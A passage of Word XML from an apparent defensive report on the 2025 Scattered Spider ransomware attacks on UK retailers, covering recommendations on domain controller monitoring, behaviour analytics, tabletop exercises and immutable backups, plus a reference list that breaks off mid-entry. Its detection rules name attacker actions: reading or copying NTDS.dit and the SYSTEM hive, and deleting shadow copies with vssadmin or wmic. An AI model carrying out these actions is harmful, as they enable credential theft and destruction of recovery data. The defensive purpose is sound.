    <w:p w14:paraId="63EA2652" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc227971089"/>
      <w:bookmarkStart w:id="50" w:name="_Toc228127119"/>
      <w:r>
        <w:t xml:space="preserve">6.4 Strengthen Domain Controller Monitoring and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Protection [HIGH PRIORITY]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="28CD12C0" w14:textId="4E2CD692" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Rationale: </w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">In February 2025, exfiltration of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> was not detected for weeks. This is the "crown jewels" of a Windows Active Directory domain</w:t>
      </w:r>
      <w:r w:rsidR="009013F4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE6A4B" w14:textId="46E8997E" w:rsidR="009013F4" w:rsidRDefault="009013F4" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Action: Create a custom rule to monitor - should any process (other than system processes) try to copy or read </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or SYSTEM registry key, alert immediately. Windows Event IDs 4656/4663 (object access) should trigger a high-fidelity alarm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D0AD51" w14:textId="355087BF" w:rsidR="009013F4" w:rsidRDefault="009013F4" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Action: Turn on Windows Advanced Audit Policy on all Domain Controllers; stream to SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7095CFD1" w14:textId="28AE4601" w:rsidR="009013F4" w:rsidRDefault="009013F4" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Action: Limit the ability to create VSS snapshots on Domain Controllers; alert on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vssadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or wmic shadow copy commands to delete snapshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73313362" w14:textId="2F6228CF" w:rsidR="00E81640" w:rsidRDefault="009013F4" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Effort/Cost: Low - configuration tuning and detection content tuning; 2-4 weeks engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418D2772" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2F092B" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc227971090"/>
      <w:bookmarkStart w:id="52" w:name="_Toc228127120"/>
      <w:r>
        <w:t>6.5 Deploy User and Entity Behaviour Analytics (UEBA) with Tuned Baselines [MEDIUM PRIORITY]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="2A7F9EC6" w14:textId="4F1F46BC" w:rsidR="00E81640" w:rsidRDefault="009013F4" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009013F4">
        <w:t>Rationale: Long dwell time is a sign of a lack of behaviour detection. UEBA solutions baseline user and entity behaviour and trigger alarms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFAD7D6" w14:textId="167F4F10" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r w:rsidR="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ntroduce UEBA (Microsoft Sentinel UEBA or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exabeam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Securonix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) to create baselines for: login timing and locations, use of RMM tools, volume of data uploaded to cloud storage, and patterns of enumeration of privileged accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3718A4" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Action: Configure alerts specifically for: first-time use of RMM tools by non-IT accounts; large-scale LDAP enumeration; cloud exfiltration exceeding threshold volume; new MFA device registration outside of approved onboarding periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B914A2" w14:textId="6DC97685" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Effort/Cost: Medium — </w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UEBA costs (approximately £15-30 per user per year) and 3-6 months of work to baseline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71596882" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E0B4561" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc227971091"/>
      <w:bookmarkStart w:id="54" w:name="_Toc228127121"/>
      <w:r>
        <w:t>6.6 Mandate Cyber Incident Rehearsals at Board and Technical Levels [MEDIUM PRIORITY]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="61716158" w14:textId="50AF1ED5" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Rationale: </w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Co-op's best practice was derived from its regular rehearsals. M&amp;S's increased spending on staff and budget had not been reflected with equivalent exercise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B05545" w14:textId="44F56AB8" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Run bi-annual tabletop exercises for scenarios centred on social-engineering-based ransomware at the executive (decision-making) and technical (SOC/IR) levels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C40BE9" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Action: Include third-party IT service providers in exercises to test the helpdesk authentication protocol under pressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4409CD4D" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Effort/Cost: Low-Medium — external facilitation of tabletop exercises (~£20,000–£50,000 per exercise).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4715CCC7" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5DC4E9" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc227971092"/>
      <w:bookmarkStart w:id="56" w:name="_Toc228127122"/>
      <w:r>
        <w:t>6.7 Enforce Immutable, Offline Backup Architecture [HIGH PRIORITY]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="6A57F795" w14:textId="3D1FBF73" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Rationale: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/Scattered Spider often destroys shadow copies and backup systems to eliminate recovery. Immutable backup architecture eliminates this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC20045" w14:textId="4496DBCA" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Adopt the "3-2-1-1" backup strategy: 3 copies of data, on 2 different types of media, 1 offsite copy and 1 immutable (air-gapped or write-once) copy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C913B8B" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Action: Test restoration procedures quarterly; ensure recovery time objectives (RTOs) are validated against actual ransomware recovery scenarios — not just hardware failure scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA63397" w14:textId="28D7F9B4" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Effort/Cost: </w:t>
      </w:r>
      <w:r w:rsidR="009013F4" w:rsidRPr="009013F4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Medium - cloud immutable backup storage (e.g., AWS S3 Object Lock, Microsoft Azure Immutable Blob) increases the cost of backup by 20-30%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7515F780" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C4ECEC" w14:textId="027BFCDB" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2563EB"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc227971093"/>
      <w:bookmarkStart w:id="58" w:name="_Toc228127123"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7. References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="2BC20AA7" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Al Jazeera (2 May 2025). 'Harrods, M&amp;S hit by cyberattack: What happened, who's behind it?' Available at: aljazeera.com [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1F783E" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Barricade Cyber Solutions (2025). 'CTI Report: Scattered Spider Threat Actor Group.' Available at: barricadecyber.com [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2854B89E" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>BlackFog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2025). 'Marks &amp; Spencer Breach: How A Ransomware Attack Crippled a UK Retail Giant.' Available at: blackfog.com [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553B53EC" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>CISA / FBI / NCSC / ACSC (29 July 2025). Cybersecurity Advisory AA23-320A (Updated): Scattered Spider. Available at: ic3.gov/CSA/2025/250729.pdf [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F6C5C" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>CM-Alliance (2025). 'The Marks &amp; Spencer Cyber Attack — Everything You Need to Know.' Available at: cm-alliance.com [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABCE747" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer Weekly (Apr–Jul 2025). Multiple articles: M&amp;S </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>cyber attack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> disruption; Scattered Spider tactics; Category 2 cyber hurricane. Available at: computerweekly.com [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C01712C" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Hack The Box (2025). '£300m gone: How Scattered Spider hit the UK's biggest retailers.' Available at: hackthebox.com/blog [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5F91C7" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mandiant / Google Cloud (2025). 'Defending Against UNC3944: Cybercrime Hardening Guidance from the Frontlines.' Available at: cloud.google.com [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6368759A" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK (2025). Group G1015: Scattered Spider. Available at: attack.mitre.org/groups/G1015 [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39748DF5" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>MTI.com (2 Sep 2025). 'M&amp;S vs Co-op: How Two 2025 Cyber-Attacks Ended So Differently.' Available at: mti.com [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4776B0E4" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>NCSC (2025). Cyber Essentials: Access Control and Secure Configuration guidance. Available at: ncsc.gov.uk [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6D0035" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>NIST (2020). SP 800-207: Zero Trust Architecture. National Institute of Standards and Technology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ADC1E1" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>NIST (2017). SP 800-63B: Digital Identity Guidelines — Authentication and Lifecycle Management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF3994C" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Picus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security (2025). 'Retail Under Fire: Inside the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ransomware Attacks on Industry Giants.' Available at: picussecurity.com [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4CDA2B" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Prelude Security (2025). 'Common MITRE ATT&amp;CK Techniques in 2025 UK Retailer Cyberattacks.' Available at: preludesecurity.com [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5A6A22" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Quorum Cyber (May 2025). 'What We Know About Ransomware Group Scattered Spider.' Available at: quorumcyber.com [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA64AE9" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Reuters (May 2025). Financial impact reporting on M&amp;S </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>cyber attack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. Available at: reuters.com [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9474BB" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sangfor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (May 2025). 'Marks &amp; Spencer Cyberattack: A Wake-Up Call for Supply Chain Cybersecurity.' Available at: sangfor.com [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4F0A97" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Security Journal UK (Jun 2025). 'M&amp;S Cyber Attack — Everything We Know.' Available at: securityjournaluk.com [Accessed April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5628D6" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>UK Parliament Business and Trade Sub-Committee (8 July 2025). Oral Evidence: Economic Security — Marks &amp; Spencer and Co-op cyber incidents [Norman, A. and Elsey, B., witnesses]. Hansard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30695563" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Verizon (2024). Data Breach Investigations Report (DBIR). Available at: verizon.com/</w:t>
      </w:r>
